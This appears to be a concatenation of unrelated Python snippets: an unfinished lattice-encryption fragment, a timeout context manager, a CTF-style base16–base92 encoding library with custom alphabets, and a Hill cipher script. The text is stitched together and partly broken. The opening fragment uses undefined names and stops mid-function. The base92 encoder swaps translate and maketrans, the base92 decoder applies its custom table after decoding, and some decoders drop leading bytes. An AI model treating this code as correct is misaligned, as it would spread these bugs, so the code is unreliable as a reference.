# print(c1,c2)
print(decrypt(s, c1, c2))


def PublicKeygen(A, s):
    e = gen_small_poly()

    b = A*s + e




import contextlib
import errno
import os
import signal

DEFAULT_TIMEOUT_MESSAGE = os.strerror(errno.ETIME)

class timeout(contextlib.ContextDecorator):
    def __init__(
        self,
        seconds,
        *,
        timeout_message=DEFAULT_TIMEOUT_MESSAGE,
        suppress_timeout_errors=False,
    ):
        self.seconds = int(seconds)
        self.timeout_message = timeout_message
        self.suppress = bool(suppress_timeout_errors)

    def _timeout_handler(self, signum, frame):
        raise TimeoutError(self.timeout_message)

    def __enter__(self):
        signal.signal(signal.SIGALRM, self._timeout_handler)
        signal.alarm(self.seconds)

    def __exit__(self, exc_type, exc_val, exc_tb):
        signal.alarm(0)
        if self.suppress and exc_type is TimeoutError:
            return True


import base64

base16_table = b"0123456789ABCDEF"
base32_table = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
base36_table = b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
base58_table = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
base62_table = b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
base64_table = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
base85_table = b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!#$%&()*+-;<=>?@^_`{|}~"
base91_table = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~\""
base92_table = b"!#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_abcdefghijklmnopqrstuvwxyz{|}"


base92_ord = lambda x: 0 if x == ord('!') else x - ord('#') + 1 if ord('#') <= x <= ord('_') else x - ord(
    'a') + 62


def b16encode(content: bytes, code_table: bytes = None):
    cipher = base64.b16encode(content)
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(base64_table, code_table))
    return cipher


def b16decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base64_table))
    return base64.b16decode(cipher)


def b32encode(content: bytes, code_table: bytes = None):
    cipher = base64.b32encode(content)
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(base32_table, code_table))
    return cipher


def b32decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base32_table))
    return base64.b32decode(cipher)


def b36encode(content: bytes, code_table: bytes = None):
    num = 0
    alphabet = base36_table if code_table is None else code_table
    for i in content:
        num = num*256 + i

    value = []
    while num != 0:
        num, index = divmod(num, 36)
        value.append(alphabet[index])

    return bytes(value)[::-1] or b"0"


def b36decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base36_table))
    num = hex(int(cipher, 36))[2:]

    res = ""
    for i in range(len(num) // 2):
        res += chr(int(num[2*i:2*i+2], 16))

    return res.encode()


def b58encode(content: bytes, code_table: bytes = None):
    num = 0
    alphabet = base58_table if code_table is None else code_table
    for i in content:
        num = num * 256 + i

    value = []
    while num != 0:
        num, index = divmod(num, 58)
        value.append(alphabet[index])

    return bytes(value)[::-1] or b"0"


def b58decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base58_table))
    num = 0
    for i in cipher:
        v = base58_table.index(i)
        num = num * 58 + v
    num = hex(num)[2:]

    res = ""
    for i in range(len(num) // 2):
        res += chr(int(num[2*i:2*i+2], 16))

    return res.encode()


def b62encode(content: bytes, code_table: bytes = None):
    num = 0
    alphabet = base62_table if code_table is None else code_table
    for i in content:
        num = num * 256 + i

    value = []
    while num != 0:
        num, index = divmod(num, 62)
        value.append(alphabet[index])

    return bytes(value)[::-1] or b"0"


def b62decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base62_table))
    num = 0
    for i in cipher:
        v = base62_table.index(i)
        num = num * 62 + v
    num = hex(num)[2:]

    res = ""
    for i in range(len(num) // 2):
        res += chr(int(num[2*i:2*i+2], 16))

    return res.encode()


def b64encode(content: bytes, code_table: bytes = None):
    cipher = base64.b64encode(content)
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(base64_table, code_table))
    return cipher


def b64decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base64_table))
    return base64.b64decode(cipher)


def b85encode(content: bytes, code_table: bytes = None):
    cipher = base64.b85encode(content)
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(base85_table, code_table))
    return cipher


def b85decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base85_table))
    return base64.b85decode(cipher)


def b91encode(content: bytes, code_table: bytes = None):
    b = 0
    n = 0
    out = []
    for i in content:
        b |= i << n
        n += 8
        if n > 13:
            v = b & 8191
            if v > 88:
                b >>= 13
                n -= 13
            else:
                v = b & 16383
                b >>= 14
                n -= 14
            out.append(base91_table[v % 91])
            out.append(base91_table[v // 91])
    if n:
        out.append(base91_table[b % 91])
        if n > 7 or b > 90:
            out.append(base91_table[b // 91])

    out = bytes(out)
    if code_table is not None:
        out = out.translate(bytes.maketrans(base91_table, code_table))
    return out


def b91decode(cipher: bytes, code_table: bytes = None):
    if code_table is not None:
        cipher = cipher.translate(bytes.maketrans(code_table, base91_table))
    v = -1
    b = 0
    n = 0
    out = []
    for i in cipher:
        if not i in base91_table:
             continue
        c = base91_table.index(i)
        if v < 0:
            v = c
        else:
            v += c * 91
            b |= v << n
            n += 13 if (v & 8191) > 88 else 14
            while True:
                out.append(b & 255)
                b >>= 8
                n -= 8
                if not n > 7:
                    break
            v = -1
    if v + 1:
        out.append((b | v << n) & 255)
    return bytes(out)


def b92encode(content: bytes, code_table: bytes = None):
    bitstr = ''
    while len(bitstr) < 13 and content:
        bitstr += bin(content[0])[2:].zfill(8)
        content = content[1:]

    res = ""
    while len(bitstr) > 13 or content:
        i = int(bitstr[:13], 2)
        res += chr(base92_table[i // 91])
        res += chr(base92_table[i % 91])
        bitstr = bitstr[13:]
        while len(bitstr) < 13 and content:
            bitstr += bin(content[0])[2:].zfill(8)
            content = content[1:]

    if bitstr:
        if len(bitstr) < 7:
            bitstr += '0' * (6 - len(bitstr))
            res += chr(base92_table[int(bitstr, 2)])
        else:
            bitstr += '0' * (13 - len(bitstr))
            i = int(bitstr, 2)
            res += chr(base92_table[i // 91])
            res += chr(base92_table[i % 91])
    res = res.encode()
    if code_table is not None:
        res = res.maketrans(bytes.translate(base92_table, code_table))
    return res


def b92decode(cipher: bytes, code_table: bytes = None):
    bitstr = ''
    res = ""
    for i in range(len(cipher) // 2):
        x = base92_ord(cipher[2*i]) * 91 + base92_ord(cipher[2*i + 1])
        bitstr += bin(x)[2:].zfill(13)
        while 8 <= len(bitstr):
            res += chr(int(bitstr[:8], 2))
            bitstr = bitstr[8:]

    if len(cipher) % 2 == 1:
        x = base92_ord(cipher[-1])
        bitstr += bin(x)[2:].zfill(6)
        while 8 <= len(bitstr):
            res += chr(int(bitstr[:8], 2))
            bitstr = bitstr[8:]

    res = res.encode()
    if code_table is not None:
        res = res.translate(bytes.maketrans(code_table, base92_table))
    return res


def b128encode(content: bytes, code_table: bytes = None): ...
def b128decode(cipher: bytes, code_table: bytes = None): ...


base16_encode = b16encode
base16_decode = b16decode

base32_encode = b32encode
base32_decode = b32decode

base36_encode = b36encode
base36_decode = b36decode

base58_encode = b58encode
base58_decode = b58decode

base62_encode = b62encode
base62_decode = b62decode

base64_encode = b64encode
base64_decode = b64decode

base85_encode = b85encode
base85_decode = b85decode

base91_encode = b91encode
base91_decode = b91decode

base92_encode = b92encode
base92_decode = b92decode

base128_encode = b128encode
base128_decode = b128decode


# print(base58_encode(b'A')) # 对a进行base64编码
# print(base64_decode(b'ME====')) # 进行base64解码
#
# print(base92_encode(b'a')) # 对a进行base92编码


# print(base64_encode(b'flag{xxxxxxxxx}', b'DEFGHIJmno789+B1Za/STUpqrstKkluv234hijXYwxyzMC0NOP56VWLQRbcdefgA'))

# print(base64_decode(b'sXP3sQCRum3Rum3Rum3f', b'DEFGHIJmno789+B1Za/STUpqrstKkluv234hijXYwxyzMC0NOP56VWLQRbcdefgA'))

# print(base32_encode(b'hello'))
# print(base32_encode(b'hello', b'qwertyuiopasdfghjklzxcvbnm123456'))
# print(base32_decode(b'fwlvn2rh', b'qwertyuiopasdfghjklzxcvbnm123456'))
# print(base32_decode(b'ie======', b"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567".lower()))
print(base92_decode(b'73E-30U1&>V-H965S95]I<U]P;W=E<GT`'))
if __name__ == '__main__':
    pass




# -*- coding: utf-8 -*-
"""
-------------------------------------------------
   File Name :      hill
   Description :
   Author :         x3nny
   date :           2021/10/29
-------------------------------------------------
   Change Activity:
                    2021/10/29: Init
-------------------------------------------------
"""
__author__ = 'x3nny'

import numpy as np
import gmpy2

def encode(s: str, key: str):
    """
    希尔加密
    :param s: 长度为n的字符串
    :param key: 长度为n*n的字符串
    :return:
    """
    ss = []
    for i in s:
        ss.append(ord(i.upper()) - 65)

    keys = []
    for i in range(len(s)):
        keys.append([])
        for j in range(len(s)):
            keys[i].append(ord(key[i*len(s) + j].upper())-65)

    keys = np.array(keys)
    ss = np.array(ss)

    ret = ''
    for i in np.dot(keys, ss):
        ret += chr(65 + i % 26)
    return ret


def decode(s: str, key: str):
    """
    希尔加密
    :param s: 长度为n的字符串
    :param key: 长度为n*n的字符串
    :return:
    """
    ss = []
    for i in s:
        ss.append(ord(i.upper()) - 65)

    keys = []
    for i in range(len(s)):
        keys.append([])
        for j in range(len(s)):
            keys[i].append(ord(key[i*len(s) + j].upper())-65)

    keys = np.array(keys)
    det = int(np.linalg.det(keys))
    keys_inv = np.linalg.inv(keys)

    keys_star = keys_inv * det
    det_inv = int(gmpy2.invert(det, 26))
    keys = (det_inv * keys_star) % 26

    ss = np.array(ss)

    ret = ''
    for i in np.dot(keys, ss):
        ret += chr(65 + int(i + 1e-6) % 26)
    return ret

if __name__ == '__main__':
    # s = 'ABC'
    key = 'GYBNQKURP'
    # print(encode(s, key))
    print(decode('AKV',key))
